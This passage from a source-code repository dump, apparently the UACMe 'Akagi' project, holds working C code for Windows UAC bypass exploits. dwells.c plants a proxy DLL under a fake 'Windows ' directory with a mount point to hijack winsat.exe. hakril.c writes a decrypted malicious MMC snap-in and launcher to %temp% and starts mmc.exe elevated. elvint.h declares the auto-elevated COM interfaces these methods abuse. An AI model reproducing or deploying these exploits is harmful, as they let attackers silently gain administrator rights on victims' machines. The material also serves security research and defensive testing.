0x60);\nUCM_DEFINE_GUID(IID_ElevatedFactoryServer, 0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57, 0x61, 0x0B, 0x08);\n\nHRESULT ucmAllocateElevatedObject(\n    _In_ LPCWSTR lpObjectCLSID,\n    _In_ REFIID riid,\n    _In_ DWORD dwClassContext,\n    _Outptr_ void **ppv);\n\nBOOL ucmMasqueradedCreateSubDirectoryCOM(\n    _In_ LPCWSTR ParentDirectory,\n    _In_ LPCWSTR SubDirectory);\n\nBOOL ucmMasqueradedMoveCopyFileCOM(\n    _In_ LPCWSTR SourceFileName,\n    _In_ LPCWSTR DestinationDir,\n    _In_ BOOL fMove);\n\nBOOL ucmMasqueradedMoveFileCOM(\n    _In_ LPCWSTR SourceFileName,\n    _In_ LPCWSTR DestinationDir);\n\nBOOL ucmMasqueradedDeleteDirectoryFileCOM(\n    _In_ LPCWSTR FileName);\n\nBOOL ucmMasqueradedRenameElementCOM(\n    _In_ LPCWSTR OldName,\n    _In_ LPCWSTR NewName);\n\nBOOL ucmMasqueradedGetObjectSecurityCOM(\n    _In_ LPCWSTR lpTargetObject,\n    _In_ SECURITY_INFORMATION SecurityInformation,\n    _In_ SE_OBJECT_TYPE ObjectType,\n    _Inout_ LPOLESTR *Sddl);\n\nBOOL ucmMasqueradedSetObjectSecurityCOM(\n    _In_ LPCWSTR lpTargetObject,\n    _In_ SECURITY_INFORMATION SecurityInformation,\n    _In_ SE_OBJECT_TYPE ObjectType,\n    _In_ LPCWSTR NewSddl);\n"
  },
  {
    "path": "Source/Akagi/methods/dwells.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2020\n*\n*  TITLE:       DWELLS.C\n*\n*  VERSION:     3.50\n*\n*  DATE:        14 Sep 2020\n*\n*  David Wells based method.\n*\n*  Original method URL:\n*  https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmDirectoryMockMethod\n*\n* Purpose:\n*\n* UAC bypass abusing GetLongPathNameW behavior during AIS.\n*\n*/\nNTSTATUS ucmDirectoryMockMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS            MethodResult = STATUS_ACCESS_DENIED;\n    HANDLE              hFakeWindows = NULL;\n    UNICODE_STRING      usDirectoryName;\n    OBJECT_ATTRIBUTES   ObjectAttributes;\n\n    WCHAR szPayloadDir[MAX_PATH * 2];\n    WCHAR szSource[MAX_PATH * 2];\n    WCHAR szDest[MAX_PATH * 2];\n\n    do {\n\n        //\n        // Create destination dir \"system32\" in %temp%\n        //\n        _strcpy(szPayloadDir, g_ctx->szTempDirectory);\n        _strcat(szPayloadDir, L\"system32\\\\\");\n        if (!CreateDirectory(szPayloadDir, NULL)) {\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                break;\n        }\n\n        //\n        // Drop fubuki to %temp%\\system32 as winmm.dll\n        //\n        _strcpy(szDest, szPayloadDir);\n        _strcat(szDest, WINMM_DLL);\n        if (!supWriteBufferToFile(szDest, ProxyDll, ProxyDllSize))\n            break;\n\n        //\n        // Copy winsat to %temp%\\system32\n        //\n        _strcpy(szSource, g_ctx->szSystemDirectory);\n        _strcat(szSource, WINSAT_EXE);\n\n 
       _strcpy(szDest, szPayloadDir);\n        _strcat(szDest, WINSAT_EXE);\n        if (!CopyFile(szSource, szDest, FALSE))\n            break;\n\n        //\n        // Fake root.\n        //\n        RtlSecureZeroMemory(szSource, sizeof(szSource));\n        szSource[0] = L'\\\\';\n        szSource[1] = L'?';\n        szSource[2] = L'?';\n        szSource[3] = L'\\\\';\n        _strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);\n        _strcat(szSource, L\"Windows \");\n\n        RtlInitUnicodeString(&usDirectoryName, szSource);\n        InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName,\n            OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        if (!NT_SUCCESS(supCreateDirectory(\n            &hFakeWindows,\n            &ObjectAttributes,\n            FILE_SHARE_READ | FILE_SHARE_WRITE,\n            FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN)))\n        {\n            break;\n        }\n\n        //\n        // Set reparse to %temp%.\n        //\n        _strcpy(szSource, L\"\\\\??\\\\\");\n        _strcat(szSource, g_ctx->szTempDirectory);\n        supSetMountPoint(\n            hFakeWindows,\n            szSource,\n            &szSource[4]);\n\n        //\n        // Run target application.\n        //\n        RtlSecureZeroMemory(&szSource, sizeof(szSource));\n        _strncpy(szSource, 4, g_ctx->szSystemRoot, 4);\n        _strcat(szSource, L\"Windows \\\\system32\\\\\");\n        _strcat(szSource, WINSAT_EXE);\n        if (supRunProcess(szSource, NULL))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    if (hFakeWindows) {\n        //\n        // Remove reparse point.\n        //\n        supDeleteMountPoint(hFakeWindows);\n        NtClose(hFakeWindows);\n\n        //\n        // Remove directory.\n        //\n        RtlSecureZeroMemory(szSource, sizeof(szSource));\n        szSource[0] = L'\\\\';\n        szSource[1] = L'?';\n        szSource[2] = L'?';\n        szSource[3] = 
L'\\\\';\n        _strncpy(&szSource[4], 4, g_ctx->szSystemRoot, 4);\n        _strcat(szSource, L\"Windows \");\n\n        RtlInitUnicodeString(&usDirectoryName, szSource);\n        InitializeObjectAttributes(&ObjectAttributes, &usDirectoryName,\n            OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n        NtDeleteFile(&ObjectAttributes);\n    }\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/elvint.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2022\n*\n*  TITLE:       ELVINT.H\n*\n*  VERSION:     3.62\n*\n*  DATE:        04 Jul 2022\n*\n*  Prototypes and definitions for elevated interface methods.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n \ntypedef interface IColorDataProxy IColorDataProxy;\ntypedef interface ICMLuaUtil ICMLuaUtil;\ntypedef interface IFwCplLua IFwCplLua;\ntypedef interface IEditionUpgradeManager IEditionUpgradeManager;\ntypedef interface ISecurityEditor ISecurityEditor;\ntypedef interface IIEAdminBrokerObject IIEAdminBrokerObject;\ntypedef interface IActiveXInstallBroker IActiveXInstallBroker;\ntypedef interface IWscAdmin IWscAdmin;\ntypedef interface IElevatedFactoryServer IElevatedFactoryServer;\n\n//VTBL DEF\n\ntypedef struct IColorDataProxyVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n            __RPC__in IColorDataProxy * This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void **ppvObject);\n\n        ULONG(STDMETHODCALLTYPE *AddRef)(\n            __RPC__in IColorDataProxy * This);\n\n        ULONG(STDMETHODCALLTYPE *Release)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method1)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method2)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method3)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method4)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method5)(\n        
    __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method6)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method7)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method8)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method9)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method10)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *Method11)(\n            __RPC__in IColorDataProxy * This);\n\n        HRESULT(STDMETHODCALLTYPE *LaunchDccw)(\n            __RPC__in IColorDataProxy * This,\n            _In_      HWND hwnd);\n\n    END_INTERFACE\n\n} *PIColorDataProxyVtbl;\n\ntypedef struct ICMLuaUtilVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n            __RPC__in ICMLuaUtil * This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void **ppvObject);\n\n        ULONG(STDMETHODCALLTYPE *AddRef)(\n            __RPC__in ICMLuaUtil * This);\n\n        ULONG(STDMETHODCALLTYPE *Release)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *SetRasCredentials)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *SetRasEntryProperties)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *DeleteRasEntry)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *LaunchInfSection)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *LaunchInfSectionEx)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *CreateLayerDirectory)(\n            
__RPC__in ICMLuaUtil * This);\n\n        HRESULT(STDMETHODCALLTYPE *ShellExec)(\n            __RPC__in ICMLuaUtil * This,\n            _In_     LPCTSTR lpFile,\n            _In_opt_  LPCTSTR lpParameters,\n            _In_opt_  LPCTSTR lpDirectory,\n            _In_      ULONG fMask,\n            _In_      ULONG nShow);\n\n        HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(\n            __RPC__in ICMLuaUtil * This,\n            _In_      HKEY hKey,\n            _In_opt_  LPCTSTR lpSubKey,\n            _In_opt_  LPCTSTR lpValueName,\n            _In_      LPCTSTR lpValueString);\n\n        HRESULT(STDMETHODCALLTYPE *DeleteRegistryStringValue)(\n            __RPC__in ICMLuaUtil * This,\n            _In_      HKEY hKey,\n            _In_      LPCTSTR lpSubKey,\n            _In_      LPCTSTR lpValueName);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *DeleteRegKeysWithoutSubKeys)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *DeleteRegTree)(\n            __RPC__in ICMLuaUtil * This);\n\n        HRESULT(STDMETHODCALLTYPE *ExitWindowsFunc)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *AllowAccessToTheWorld)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *CreateFileAndClose)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *DeleteHiddenCmProfileFiles)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *CallCustomActionDll)(\n            __RPC__in ICMLuaUtil * This);\n\n        HRESULT(STDMETHODCALLTYPE *RunCustomActionExe)(\n            __RPC__in       ICMLuaUtil * This,\n            _In_            LPCTSTR lpFile,\n            _In_opt_        LPCTSTR lpParameters,\n            _COM_Outptr_    LPCTSTR 
*pszHandleAsHexString);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *SetRasSubEntryProperties)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *DeleteRasSubEntry)(\n            __RPC__in ICMLuaUtil * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *SetCustomAuthData)(\n            __RPC__in ICMLuaUtil * This);\n\n    END_INTERFACE\n\n} *PICMLuaUtilVtbl;\n\ntypedef struct IFwCplLuaInterfaceVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n            __RPC__in IFwCplLua* This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void** ppvObject);\n\n        ULONG(STDMETHODCALLTYPE* AddRef)(\n            __RPC__in IFwCplLua* This);\n\n        ULONG(STDMETHODCALLTYPE* Release)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* GetTypeInfoCount)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* GetTypeInfo)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* GetIDsOfNames)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* Invoke)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* AddGlobalPort)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* AddProgram)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* DeleteGlobalPort)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* DeleteApplication)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* 
EnablePort)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* EnableProgram)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* EnableRuleGroup)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* EnableCustomRule)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* EditGlobalPort)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* EditProgram)(\n            __RPC__in IFwCplLua* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* Activate)(\n            __RPC__in IFwCplLua* This);\n\n        HRESULT(STDMETHODCALLTYPE* LaunchAdvancedUI)(\n            __RPC__in IFwCplLua* This);\n\n    END_INTERFACE\n\n} *PIFwCplLuaInterfaceVtbl;\n\ntypedef struct IEditionUpgradeManagerVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n            __RPC__in IEditionUpgradeManager * This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void **ppvObject);\n\n        ULONG(STDMETHODCALLTYPE *AddRef)(\n            __RPC__in IEditionUpgradeManager * This);\n\n        ULONG(STDMETHODCALLTYPE *Release)(\n            __RPC__in IEditionUpgradeManager * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *InitializeWindow)(\n            __RPC__in IEditionUpgradeManager * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystem)(\n            __RPC__in IEditionUpgradeManager * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *ShowProductKeyUI)(\n            __RPC__in IEditionUpgradeManager * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *UpdateOperatingSystemWithParams)(\n            
__RPC__in IEditionUpgradeManager * This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseForWindows)(\n            __RPC__in IEditionUpgradeManager * This);\n\n        HRESULT(STDMETHODCALLTYPE *AcquireModernLicenseWithPreviousId)(\n            __RPC__in IEditionUpgradeManager * This,\n            __RPC__in LPWSTR PreviousId,\n            __RPC__in DWORD *Data);\n\n    //incomplete, irrelevant\n    END_INTERFACE\n\n} *PIEditionUpgradeManagerVtbl;\n\ntypedef struct ISecurityEditorVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE *QueryInterface)(\n            __RPC__in ISecurityEditor * This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void **ppvObject);\n\n        ULONG(STDMETHODCALLTYPE *AddRef)(\n            __RPC__in ISecurityEditor * This);\n\n        ULONG(STDMETHODCALLTYPE *Release)(\n            __RPC__in ISecurityEditor * This);\n\n        HRESULT(STDMETHODCALLTYPE *GetSecurity)(\n            __RPC__in ISecurityEditor * This,\n            _In_ LPCOLESTR ObjectName,\n            _In_ SE_OBJECT_TYPE ObjectType,\n            _In_ SECURITY_INFORMATION SecurityInfo,\n            _Out_opt_ LPCOLESTR * ppSDDLStr);\n\n        HRESULT(STDMETHODCALLTYPE *SetSecurity)(\n            __RPC__in ISecurityEditor * This,\n            _In_ LPCOLESTR ObjectName,\n            _In_ SE_OBJECT_TYPE ObjectType,\n            _In_ SECURITY_INFORMATION SecurityInfo,\n            _In_ LPCOLESTR ppSDDLStr);\n\n    END_INTERFACE\n\n} *PISecurityEditorVtbl;\n\ntypedef struct IIEAdminBrokerObjectVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n            __RPC__in IIEAdminBrokerObject* This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void** ppvObject);\n\n        ULONG(STDMETHODCALLTYPE* AddRef)(\n            __RPC__in IIEAdminBrokerObject* This);\n\n        ULONG(STDMETHODCALLTYPE* Release)(\n            __RPC__in IIEAdminBrokerObject* This);\n\n       
 //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* InitializeAdminInstaller)(\n            __RPC__in IIEAdminBrokerObject* This,\n            _In_opt_ LPCOLESTR ProviderName,\n            _In_ DWORD Unknown0,\n            _COM_Outptr_ void** InstanceGuid);\n\n    END_INTERFACE\n\n} *PIIEAdminBrokerObjectVtbl;\n\ntypedef struct IActiveXInstallBrokerVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n            __RPC__in IActiveXInstallBroker* This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_  void** ppvObject);\n\n        ULONG(STDMETHODCALLTYPE* AddRef)(\n            __RPC__in IActiveXInstallBroker* This);\n\n        ULONG(STDMETHODCALLTYPE* Release)(\n            __RPC__in IActiveXInstallBroker* This);\n\n        //incomplete definition\n        HRESULT(STDMETHODCALLTYPE* VerifyFile)(\n            __RPC__in IActiveXInstallBroker* This,\n            _In_ BSTR InstanceGuid,\n            _In_ HWND ParentWindow,\n            _In_ BSTR Unknown0,\n            _In_ BSTR pcwszFilePath,\n            _In_ BSTR Unknown1,\n            _In_ ULONG dwUIChoice,\n            _In_ ULONG dwUIContext,\n            _In_ REFGUID GuidKey,\n            _Out_ BSTR* VerifiedFileName,\n            _Out_ PULONG CertDetailsSize,\n            _Out_ void** CertDetails);\n\n        HRESULT(STDMETHODCALLTYPE* RunSetupCommand)(\n            __RPC__in IActiveXInstallBroker* This,\n            _In_ BSTR InstanceGuid,\n            _In_ HWND ParentWindow,\n            _In_ BSTR szCmdName,\n            _In_ BSTR szInfSection,\n            _In_ BSTR szDir,\n            _In_ BSTR szTitle,\n            _In_ ULONG dwFlags,\n            _Out_ PHANDLE lpTargetHandle);\n\n        //incomplete definition\n\n    END_INTERFACE\n\n} *PIActiveXInstallBrokerVtbl;\n\ntypedef struct IWscAdminVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n            __RPC__in IWscAdmin* This,\n            __RPC__in REFIID riid,\n     
       _COM_Outptr_  void** ppvObject);\n\n        ULONG(STDMETHODCALLTYPE* AddRef)(\n            __RPC__in IWscAdmin* This);\n\n        ULONG(STDMETHODCALLTYPE* Release)(\n            __RPC__in IWscAdmin* This);\n\n        HRESULT(STDMETHODCALLTYPE* Initialize)(\n            __RPC__in IWscAdmin* This);\n\n        HRESULT(STDMETHODCALLTYPE* DoModalSecurityAction)(\n            __RPC__in IWscAdmin* This,\n            __RPC__in HWND ParentWindow,\n            __RPC__in UINT Action,\n            _Reserved_ PVOID Reserved);\n\n    END_INTERFACE\n\n} *PIWscAdminVtbl;\n\ntypedef struct IElevatedFactoryServerVtbl {\n\n    BEGIN_INTERFACE\n\n        HRESULT(STDMETHODCALLTYPE* QueryInterface)(\n            __RPC__in IElevatedFactoryServer* This,\n            __RPC__in REFIID riid,\n            _COM_Outptr_ void** ppvObject);\n\n        ULONG(STDMETHODCALLTYPE* AddRef)(\n            __RPC__in IElevatedFactoryServer* This);\n\n        ULONG(STDMETHODCALLTYPE* Release)(\n            __RPC__in IElevatedFactoryServer* This);\n\n        HRESULT(STDMETHODCALLTYPE* ServerCreateElevatedObject)(\n            __RPC__in IElevatedFactoryServer* This,\n            __RPC__in REFCLSID rclsid,\n            __RPC__in REFIID riid,\n            _COM_Outptr_ void** ppvObject);\n\n    //incomplete definition\n\n    END_INTERFACE\n\n} *PIElevatedFactoryServerVtbl;\n\n// INTERFACE DEF\n\ninterface IColorDataProxy { CONST_VTBL struct IColorDataProxyVtbl* lpVtbl; };\ninterface ICMLuaUtil { CONST_VTBL struct ICMLuaUtilVtbl* lpVtbl; };\ninterface IFwCplLua { CONST_VTBL struct IFwCplLuaInterfaceVtbl* lpVtbl; };\ninterface IEditionUpgradeManager { CONST_VTBL struct IEditionUpgradeManagerVtbl* lpVtbl; };\ninterface ISecurityEditor { CONST_VTBL struct ISecurityEditorVtbl* lpVtbl; };\ninterface IIEAdminBrokerObject { CONST_VTBL struct IIEAdminBrokerObjectVtbl* lpVtbl; };\ninterface IActiveXInstallBroker { CONST_VTBL struct IActiveXInstallBrokerVtbl* lpVtbl; };\ninterface IWscAdmin { CONST_VTBL struct 
IWscAdminVtbl* lpVtbl; };\ninterface IElevatedFactoryServer { CONST_VTBL struct IElevatedFactoryServerVtbl* lpVtbl; };\n"
  },
  {
    "path": "Source/Akagi/methods/hakril.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2025\n*\n*  TITLE:       HAKRIL.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  UAC bypass method from Clement Rouault aka hakril.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"encresource.h\"\n\ntypedef ULONG_PTR(WINAPI* pfnAipFindLaunchAdminProcess)(\n    LPWSTR lpApplicationName,\n    LPWSTR lpParameters,\n    DWORD UacRequestFlag,\n    DWORD dwCreationFlags,\n    LPWSTR lpCurrentDirectory,\n    HWND hWnd,\n    PVOID StartupInfo,\n    PVOID ProcessInfo,\n    ELEVATION_REASON* ElevationReason);\n\n/*\n* ucmHakrilMethod\n*\n* Purpose:\n*\n* Bypass UAC by abusing \"feature\" of appinfo command line parser.\n* (all bugs are features/not a boundary of %something% by MS philosophy)\n* Command line parser logic allows execution of custom snap-in console as if it\n* \"trusted\" by Microsoft, resulting in your code running inside MMC.exe on High IL.\n*\n* Trigger: custom console snap-in with shockwave flash object resulting in\n* execution of remote script on local machine with High IL.\n*\n*/\nNTSTATUS ucmHakrilMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n    ULONG DataSize = 0, SnapinSize = 0;\n    SIZE_T Dummy, MscBufferSize = 0, MscSize = 0, MscBytesIO = 0;\n    PVOID SnapinResource = NULL, SnapinData = NULL, MscBufferPtr = NULL;\n    PVOID ImageBaseAddress = g_hInstance;  \n    CHAR *pszMarker;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n    WCHAR szParams[MAX_PATH * 3];\n    CHAR szConvertedBuffer[MAX_PATH * 2];\n\n    PROCESS_INFORMATION 
procInfo;\n\n    do { \n\n        //\n        // Decrypt and decompress custom Kamikaze snap-in.\n        //\n        SnapinResource = supLdrQueryResourceData(\n            KAMIKAZE_ID,\n            ImageBaseAddress,\n            &DataSize);\n\n        if (SnapinResource) {\n            SnapinData = g_ctx->DecompressRoutine(KAMIKAZE_ID, SnapinResource, DataSize, &SnapinSize);\n            if (SnapinData == NULL)\n                break;\n        }\n        else\n            break;\n\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            FUBUKI_DEFAULT_ENTRYPOINT,\n            TRUE))\n        {\n            break;\n        }\n\n        //\n        // Write Fubuki to the %temp%\n        //\n        RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        Dummy = _strlen(szBuffer);\n        _strcat(szBuffer, OSK_EXE);\n\n        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))\n            break;\n\n        //\n        // Build filename for launcher.\n        //\n        szBuffer[Dummy] = 0;\n        _strcat(szBuffer, KAMIKAZE_LAUNCHER);\n\n        MscBufferSize = ALIGN_UP_BY(SnapinSize + sizeof(szBuffer), PAGE_SIZE);\n        MscBufferPtr = supVirtualAlloc(\n            &MscBufferSize,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE, NULL);\n        if (MscBufferPtr == NULL)\n            break;\n\n        //\n        // Converted filename to ANSI to be used in msc modification next.\n        //\n        RtlSecureZeroMemory(szConvertedBuffer, sizeof(szConvertedBuffer));\n        WideCharToMultiByte(CP_ACP, 0, szBuffer, -1, szConvertedBuffer, sizeof(szConvertedBuffer), NULL, NULL);\n\n        //\n        // Write launcher to the %temp%\n        //\n        if (!supDecodeAndWriteBufferToFile(szBuffer,\n            (CONST PVOID)g_encodedKamikazeFinal,\n            sizeof(g_encodedKamikazeFinal),\n            'kmkz'))\n        {\n         
   break;\n        }\n\n        //\n        // Build Kamikaze filename.\n        //\n        szBuffer[Dummy] = 0;\n        _strcat(szBuffer, KAMIKAZE_MSC);\n\n        //\n        // Reconfigure msc snapin and write it to the %temp%.\n        //\n        pszMarker = _strstri_a((CHAR*)SnapinData, (const CHAR*)KAMIKAZE_MARKER);\n        if (pszMarker && pszMarker >= (CHAR*)SnapinData &&\n            pszMarker < ((CHAR*)SnapinData + SnapinSize)) {\n\n            //\n            // Copy first part of snapin (unchanged).\n            //\n            MscBytesIO = (ULONG)(pszMarker - (PCHAR)SnapinData);\n            MscSize = MscBytesIO;\n            RtlCopyMemory(MscBufferPtr, SnapinData, MscBytesIO);\n\n            //\n            // Copy modified part.\n            //\n            MscBytesIO = (ULONG)_strlen_a(szConvertedBuffer);\n            RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), (PVOID)&szConvertedBuffer, MscBytesIO);\n            MscSize += MscBytesIO;\n\n            //\n            // Copy all of the rest.\n            //\n            while (*pszMarker != 0 && *pszMarker != '<' &&\n                pszMarker < ((CHAR*)SnapinData + SnapinSize)) \n            {\n                pszMarker++;\n            }\n\n            if (pszMarker < ((CHAR*)SnapinData + SnapinSize)) {\n                MscBytesIO = (ULONG)(((PCHAR)SnapinData + SnapinSize) - pszMarker);\n                RtlCopyMemory(RtlOffsetToPointer(MscBufferPtr, MscSize), pszMarker, MscBytesIO);\n                MscSize += MscBytesIO;\n            }\n\n            //\n            // Write result to the file.\n            //\n            if (!supWriteBufferToFile(szBuffer, MscBufferPtr, (ULONG)MscSize))\n                break;\n\n            supSecureVirtualFree(MscBufferPtr, MscBufferSize, NULL);\n            MscBufferPtr = NULL;\n        }\n\n        //\n        // Prepare snap-in parameters.\n        //\n\n        _strcpy(szParams, TEXT(\"lzx32,wf.msc \\\"\"));\n        _strcat(szParams, 
szBuffer);\n        _strcat(szParams, TEXT(\"\\\"\"));\n\n        _strcpy(szBuffer, g_ctx->szSystemDirectory);\n        _strcat(szBuffer, MMC_EXE);\n        \n        //\n        // Run trigger application.\n        //\n        RtlSecureZeroMemory(&procInfo, sizeof(procInfo));\n        if (AicLaunchAdminProcess(szBuffer,\n            szParams,\n            1, //elevate\n            CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED,\n            g_ctx->szSystemRoot,\n            T_DEFAULT_DESKTOP,\n            NULL,\n            INFINITE,\n            SW_HIDE,\n            &procInfo))\n        {\n            if (procInfo.hThread) {\n                ResumeThread(procInfo.hThread);\n                CloseHandle(procInfo.hThread);\n            }\n            if (procInfo.hProcess) {\n                if (WaitForSingleObject(procInfo.hProcess, 5000) == WAIT_TIMEOUT)\n                    TerminateProcess(procInfo.hProcess, 0);\n                CloseHandle(procInfo.hProcess);\n            }\n\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    //\n    // Cleanup.\n    //\n    